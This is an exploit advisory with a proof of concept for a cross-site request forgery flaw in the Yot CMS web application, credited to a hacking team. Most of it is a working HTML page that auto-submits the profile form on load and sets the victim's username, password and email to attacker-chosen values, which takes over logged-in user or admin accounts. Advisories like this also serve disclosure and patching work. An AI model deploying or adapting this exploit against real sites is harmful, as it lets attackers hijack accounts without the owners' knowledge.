# Product : Yot CMS webapp
# Author : ÃŕMąŃđÒ - NullByteStream Team
# vendor homepage : https://sourceforge.net/projects/yot/
# Date : 10/2/2019
# Dork : N/A
##############################################################
This CSRF vulnerability allows an attacker to change user/admin account details (username, password, ...) by having a logged-in user load a page that auto-submits the profile form: the do_profil handler accepts the multipart POST without any anti-CSRF token or origin check.
Exploit (proof of concept):
<html>
<body onload='document.forms[0].submit()'>
<form action="http://site.com/index.php?page=user&op=do_profil" method="POST" name="user_form" enctype="multipart/form-data" OnSubmit='return user_form_verifchamps();'>
<table name="user_form" class="tabform" cellpadding="1" align="center" >
<tr><td valign="top"><label>Pseudo</label> :</td><td valign="top"><input type="text" name="user" value="newusername" size="30" /> * </td></tr>
<tr><td valign="top"><label>Prénom</label> :</td><td valign="top"><input type="text" name="firstname" value="armando" size="30" /></td></tr>
<tr><td valign="top"><label>Nom</label> :</td><td valign="top"><input type="text" name="name" value="syria" size="30" /></td></tr>
<tr><td valign="top"><label>Mot de passe</label> :</td><td valign="top"><input type="password" name="pass1" value="newpassword" size="30" /></td></tr>
<tr><td valign="top"><label>Retaper mot de passe</label> :</td><td valign="top"><input type="password" name="pass2" value="newpassword" size="30" /></td></tr>
<tr><td valign="top"><label>Email</label> :</td><td valign="top"><input type="text" name="mail" value="MyEmail@server.com" size="30" /> * </td></tr>
<tr><td valign="top"><label>URL Avatar</label> :</td><td valign="top"><input type="text" name="avatar" value="" size="30" /></td></tr>
<tr><td valign="top"><label>Télécharger un avatar</label> :</td><td valign="top"><input type="file" name="upload_avatar" /></td></tr>
<tr><td valign="top"><label>Thème</label> :</td><td valign="top"><select name="theme"><option value="" selected></option><option value="coolbad" >coolbad</option><option value="coolbad_jaune" >coolbad_jaune</option><option value="yot3" >yot3</option></select></td></tr>
<tr><td valign="top"><label>Prévenir par email d'une nouvelle news</label> :</td><td valign="top"><input type="radio" name="mailnews" value="1" />Oui <input type="radio" name="mailnews" value="0" checked />Non </td></tr>
</table>
<div align="center">(*) Champs obligatoires<br/><br/><input type="submit" value="Modifier"/></div>
</form>
</body>
</html>
###############################################################
NBS Team
http://nullbytestream.tk
###############################################################